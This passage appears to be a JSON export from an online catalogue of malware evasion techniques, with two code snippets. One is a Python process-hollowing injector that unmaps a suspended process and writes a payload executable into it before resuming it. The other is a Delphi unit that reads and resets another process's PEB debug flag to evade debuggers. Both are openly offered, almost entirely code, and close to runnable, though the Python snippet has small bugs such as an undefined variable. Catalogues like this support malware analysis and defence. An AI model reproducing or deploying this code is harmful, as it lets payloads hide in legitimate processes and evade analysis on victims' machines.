\"[!]Exiting\"\r\n        print \"[!]The process may still be running\"\r\n        sys.exit()\r\n        \r\n\r\nprint \"[\" + str(stepcount) +\"]Creating Suspended Process\"\r\nstepcount += 1\r\n\r\nstartupinfo = STARTUPINFO()\r\nstartupinfo.cb = sizeof(STARTUPINFO)\r\nprocessinfo = PROCESS_INFORMATION()\r\n\r\nCREATE_SUSPENDED = 0x0004\r\nif windll.kernel32.CreateProcessA(\r\n                                None,\r\n                                target_exe,\r\n                                None,\r\n                                None,\r\n                                False,\r\n                                CREATE_SUSPENDED,\r\n                                None,\r\n                                None,\r\n                                byref(startupinfo),\r\n                                byref(processinfo)) == 0:\r\n       error()\r\n 
       \r\n\r\nhProcess = processinfo.hProcess\r\nhThread = processinfo.hThread\r\n\r\n\r\nprint \"\\t[+]Successfully created suspended process! PID: \" + str(processinfo.dwProcessId)\r\nprint\r\nprint \"[\" + str(stepcount) +\"]Reading Payload PE file\"\r\nstepcount += 1\r\n\r\nFile = open(payload_exe,\"rb\")\r\npayload_data = File.read()\r\nFile.close()\r\npayload_size = len(payload_data)\r\n\r\nprint \"\\t[+]Payload size: \" + str(payload_size)\r\nprint\r\nprint \"[\" + str(stepcount) +\"]Extracting the necessary info from the payload data.\"\r\nstepcount += 1\r\n\r\npayload = PE(data = payload_data)\r\npayload_ImageBase = payload.OPTIONAL_HEADER.ImageBase\r\npayload_SizeOfImage = payload.OPTIONAL_HEADER.SizeOfImage\r\npayload_SizeOfHeaders = payload.OPTIONAL_HEADER.SizeOfHeaders\r\npayload_sections = payload.sections\r\npayload_NumberOfSections = payload.FILE_HEADER.NumberOfSections\r\npayload_AddressOfEntryPoint = payload.OPTIONAL_HEADER.AddressOfEntryPoint\r\npayload.close()\r\n\r\nMEM_COMMIT = 0x1000\r\nMEM_RESERVE = 0x2000\r\nPAGE_READWRITE = 0x4\r\n\r\npayload_data_pointer = windll.kernel32.VirtualAlloc(None,\r\n                                c_int(payload_size+1),\r\n                                MEM_COMMIT | MEM_RESERVE,\r\n                                PAGE_READWRITE)\r\n\r\n\r\nmemmove(                        payload_data_pointer,\r\n                                payload_data,\r\n                                payload_size)\r\n\r\nprint \"\\t[+]Data from the PE Header: \"\r\nprint \"\\t[+]Image Base Address: \" + str(hex(payload_ImageBase))\r\nprint \"\\t[+]Address of EntryPoint: \" + str(hex(payload_AddressOfEntryPoint))\r\nprint \"\\t[+]Size of Image: \" + str(payload_SizeOfImage)\r\nprint \"\\t[+]Pointer to data: \" + str(hex(payload_data_pointer))\r\n\r\n\r\nprint\r\nprint \"[\" + str(stepcount) +\"]Getting Context\"\r\ncx = CONTEXT()\r\ncx.ContextFlags = 0x10007\r\n\r\nif windll.kernel32.GetThreadContext(hThread, byref(cx)) == 0:\r\n       
  error()\r\nprint\r\nprint \"[\" + str(stepcount) +\"]Getting Image Base Address from target\"\r\nstepcount += 1\r\n\r\nbase = c_int(0)\r\nwindll.kernel32.ReadProcessMemory(hProcess, c_char_p(cx.Ebx+8), byref(base), sizeof(c_void_p),None)\r\ntarget_PEBaddress = base\r\nprint \"\\t[+]PEB address: \" + str(hex(target_PEBaddress.value))\r\n\r\n\r\nprint\r\nprint \"[\" + str(stepcount) +\"]Unmapping\"\r\nif target_PEBaddress ==  payload_ImageBase:\r\n        if not windll.ntdll.NtUnmapViewOfSection(\r\n                                hProcess,\r\n                                target_ImageBase):\r\n                error()\r\n\r\nprint\r\nprint \"[\" + str(stepcount) +\"]Allocation memory\"\r\nstepcount += 1\r\n\r\nMEM_COMMIT = 0x1000\r\nMEM_RESERVE = 0x2000\r\nPAGE_EXECUTE_READWRITE = 0x40\r\n\r\naddress = windll.kernel32.VirtualAllocEx(\r\n                                hProcess, \r\n                                c_char_p(payload_ImageBase), \r\n                                c_int(payload_SizeOfImage), \r\n                                MEM_COMMIT|MEM_RESERVE, \r\n                                PAGE_EXECUTE_READWRITE)\r\n\r\nif address == 0:\r\n        error()\r\n\r\nprint \"\\t[+]Allocated to: \"+ str(hex(address))\r\n\r\nprint\r\nprint \"[\" + str(stepcount) +\"]Writing Headers\"\r\nstepcount += 1\r\n\r\nlpNumberOfBytesWritten = c_size_t(0)\r\n\r\nif windll.kernel32.WriteProcessMemory(\r\n                                hProcess,\r\n                                c_char_p(payload_ImageBase),\r\n                                c_char_p(payload_data_pointer),\r\n                                c_int(payload_SizeOfHeaders),\r\n                                byref(lpNumberOfBytesWritten)) == 0:\r\n                error()\r\n\r\nprint \"\\t[+]Bytes written:\", lpNumberOfBytesWritten.value\r\nprint \"\\t[+]Pointer to data: \" + str(hex(payload_ImageBase))\r\nprint \"\\t[+]Writing to: \" + str(hex(payload_data_pointer))\r\nprint \"\\t[+]Size of data: \" + 
str(hex(payload_SizeOfHeaders))\r\n\r\nprint\r\nfor i in range(payload_NumberOfSections):\r\n        section = payload_sections[i]\r\n        dst = payload_ImageBase + section.VirtualAddress\r\n        src = payload_data_pointer + section.PointerToRawData\r\n        size = section.SizeOfRawData\r\n        print\r\n        print \"[\" + str(stepcount) +\"]Writing section: \" + section.Name\r\n        stepcount += 1\r\n        print \"\\t[+]Pointer to data: \" + str(hex(src))\r\n        print \"\\t[+]Writing to: \" + str(hex(dst))\r\n        print \"\\t[+]Size of data: \" + str(hex(size))\r\n\r\n        lpNumberOfBytesWritten  = c_size_t(0)\r\n\r\n        if windll.kernel32.WriteProcessMemory(\r\n                                hProcess,\r\n                                c_char_p(dst),\r\n                                c_char_p(src),\r\n                                c_int(size),\r\n                                byref(lpNumberOfBytesWritten)) == 0:\r\n                 error()\r\n                 \r\n        print \"\\t[+]Bytes written:\", lpNumberOfBytesWritten.value\r\n         \r\nprint\r\nprint \"[\" + str(stepcount) +\"]Editing Context\"\r\nstepcount += 1\r\n\r\ncx.Eax = payload_ImageBase + payload_AddressOfEntryPoint\r\n\r\nlpNumberOfBytesWritten  = c_size_t(0)\r\nif windll.kernel32.WriteProcessMemory(\r\n                                hProcess,\r\n                                c_char_p(cx.Ebx+8),\r\n                                c_char_p(payload_data_pointer+0x11C),\r\n                                c_int(4),\r\n                                byref(lpNumberOfBytesWritten)) == 0:\r\n         error()\r\n\r\nprint \"\\t[+]Pointer to data: \" + str(hex(cx.Ebx+8))\r\nprint \"\\t[+]Writing to: \" + str(hex(payload_data_pointer+0x11C))\r\nprint \"\\t[+]Size of data: \" + str(hex(4))\r\nprint \"\\t[+]Bytes written:\", lpNumberOfBytesWritten.value\r\n\r\nprint \r\nprint \"[\" + str(stepcount) +\"]Setting Context\"\r\nstepcount += 
1\r\n\r\nwindll.kernel32.SetThreadContext(\r\n                                hThread,\r\n                                byref(cx))\r\n\r\nprint\r\nprint \"[\" + str(stepcount) +\"]Resuming Thread\"\r\nstepcount += 1\r\n\r\nif windll.kernel32.ResumeThread(hThread) == 0:\r\n        error()\r\n\r\nprint \"[\" + str(stepcount) +\"]Success\""
        },
        {
            "language": "https://search.unprotect.it/api/snippet_languages/1/",
            "author": "https://search.unprotect.it/api/snippet_authors/1/",
            "technique": "https://search.unprotect.it/api/techniques/61/",
            "description": "",
            "plain_code": "unit UntPEBDebug;\r\n\r\ninterface\r\n\r\nuses Windows;\r\n\r\nconst PROCESS_QUERY_LIMITED_INFORMATION = $1000;\r\n        PROCESS_BASIC_INFORMATION         = 0;\r\n\r\n// https://docs.microsoft.com/en-us/windows/win32/api/winternl/nf-winternl-ntqueryinformationprocess\r\nvar _NtQueryInformationProcess : function(\r\n                                            ProcessHandle : THandle;\r\n                                            ProcessInformationClass : DWORD;\r\n                                            ProcessInformation : Pointer;\r\n                                            ProcessInformationLength :\r\n                                            ULONG; ReturnLength : PULONG) : LongInt; stdcall;\r\n\r\n    hNTDLL : THandle;\r\n\r\n\r\n{$IFDEF WIN64}\r\ntype\r\n    PProcessBasicInformation = ^TProcessBasicInformation;\r\n    TProcessBasicInformation = record\r\n    ExitStatus         : Int64;\r\n    PebBaseAddress     : Pointer;\r\n    AffinityMask       : Int64;\r\n    BasePriority       : Int64;\r\n    UniqueProcessId    : Int64;\r\n    InheritedUniquePID : Int64;\r\n    end;\r\n{$ELSE}\r\ntype\r\n    PProcessBasicInformation = ^TProcessBasicInformation;\r\n    TProcessBasicInformation = record\r\n    ExitStatus         : DWORD;\r\n    PebBaseAddress     : Pointer;\r\n    AffinityMask       : DWORD;\r\n    BasePriority       : DWORD;\r\n    UniqueProcessId    : DWORD;\r\n    InheritedUniquePID : DWORD;\r\n    end;\r\n{$ENDIF}\r\n\r\nfunction GetProcessDebugStatus(AProcessID : Cardinal; var ADebugStatus : boolean) : Boolean;\r\nfunction SetProcessDebugStatus(AProcessID : Cardinal; ADebugStatus : Boolean) : Boolean;\r\n\r\nimplementation\r\n\r\n{-------------------------------------------------------------------------------\r\n    Open a process and retrieve the point of debug flag from PEB.\r\n\r\n    If function succeed, don't forget to call close process 
handle.\r\n-------------------------------------------------------------------------------}\r\nfunction GetDebugFlagPointer(AProcessID : Cardinal; var AProcessHandle : THandle) : Pointer;\r\nvar PBI     : TProcessBasicInformation;\r\n    ARetLen : Cardinal;\r\nbegin\r\n    result := nil;\r\n    ///\r\n\r\n    AProcessHandle := 0;\r\n\r\n    if NOT Assigned(_NtQueryInformationProcess) then\r\n    Exit();\r\n    ///\r\n\r\n    AProcessHandle := OpenProcess(PROCESS_QUERY_INFORMATION or PROCESS_VM_WRITE or PROCESS_VM_READ, false, AProcessID);\r\n    if (AProcessHandle = 0) then\r\n    Exit;\r\n\r\n    if _NtQueryInformationProcess(AProcessHandle, PROCESS_BASIC_INFORMATION, @PBI, sizeOf(TProcessBasicInformation), @ARetLen) = ERROR_SUCCESS then\r\n    result := Pointer(NativeUInt(PBI.PebBaseAddress) + (SizeOf(Byte) * 2))\r\n    else\r\n    CloseHandle(AProcessHandle);\r\nend;\r\n\r\n{-------------------------------------------------------------------------------\r\n    Retrieve the target process debug status from PEB.\r\n\r\n    ADebugStatus = True  : Target process debug flag is set.\r\n    ADebugStatus = False : Target process debug flag is not set.\r\n-------------------------------------------------------------------------------}\r\nfunction GetProcessDebugStatus(AProcessID : Cardinal; var ADebugStatus : boolean) : Boolean;\r\nvar hProcess         : THandle;\r\n\r\n    pDebugFlagOffset : Pointer;\r\n    pDebugFlag       : pByte;\r\n    ABytesRead       : SIZE_T;\r\nbegin\r\n    result := false;\r\n    ///\r\n\r\n    pDebugFlagOffset := GetDebugFlagPointer(AProcessID, hProcess);\r\n\r\n    if not Assigned(pDebugFlagOffset) then\r\n    Exit();\r\n    ///\r\n    try\r\n    getMem(pDebugFlag, sizeOf(Byte));\r\n    try\r\n        if NOT ReadProcessMemory(hProcess, pDebugFlagOffset, pDebugFlag, sizeOf(Byte), ABytesRead) then\r\n        Exit;\r\n\r\n        ///\r\n        ADebugStatus := (pDebugFlag^ = 1);\r\n    finally\r\n        FreeMem(pDebugFlag);\r\n    end;\r\n\r\n  
  ///\r\n    result := (ABytesRead = SizeOf(Byte));\r\n    finally\r\n    CloseHandle(hProcess);\r\n    end;\r\nend;\r\n\r\n{-------------------------------------------------------------------------------\r\n    Update target process debug flag.\r\n\r\n    ADebugStatus = True  : Set target process debug flag.\r\n    ADebugStatus = False : Unset target process debug flag.\r\n-------------------------------------------------------------------------------}\r\nfunction SetProcessDebugStatus(AProcessID : Cardinal; ADebugStatus : Boolean) : Boolean;\r\nvar hProcess         : THandle;\r\n\r\n    pDebugFlagOffset : Pointer;\r\n    ADebugFlag       : Byte;\r\n    ABytesWritten    : SIZE_T;\r\nbegin\r\n    result := false;\r\n    ///\r\n\r\n    pDebugFlagOffset := GetDebugFlagPointer(AProcessID, hProcess);\r\n\r\n    if not Assigned(pDebugFlagOffset) then\r\n    Exit();\r\n    ///\r\n    try\r\n    if ADebugStatus then\r\n        ADebugFlag := 1\r\n    else\r\n        ADebugFlag := 0;\r\n\r\n    if NOT WriteProcessMemory(hProcess, pDebugFlagOffset, @ADebugFlag, SizeOf(Byte), ABytesWritten) then\r\n        Exit;\r\n\r\n    ///\r\n    result := (ABytesWritten = SizeOf(Byte));\r\n    finally\r\n    CloseHandle(hProcess);\r\n    end;\r\nend;\r\n\r\ninitialization\r\n    {\r\n    Load NtQueryInformationProcess from NTDLL.dll\r\n    }\r\n    _NtQueryInformationProcess := nil;\r\n\r\n    hNTDLL := LoadLibrary('ntdll.dll');\r\n\r\n    if (hNTDLL <> 0) then\r\n    @_NtQueryInformationProcess := GetProcAddress(hNTDLL, 'NtQueryInformationProcess');\r\n\r\nfinalization\r\n    _NtQueryInformationProcess := nil;\r\n\r\n    if (hNTDLL <> 0) then\r\n    FreeLibrary(hNTDLL);\r\n\r\n\r\nend."
        }
    ]
}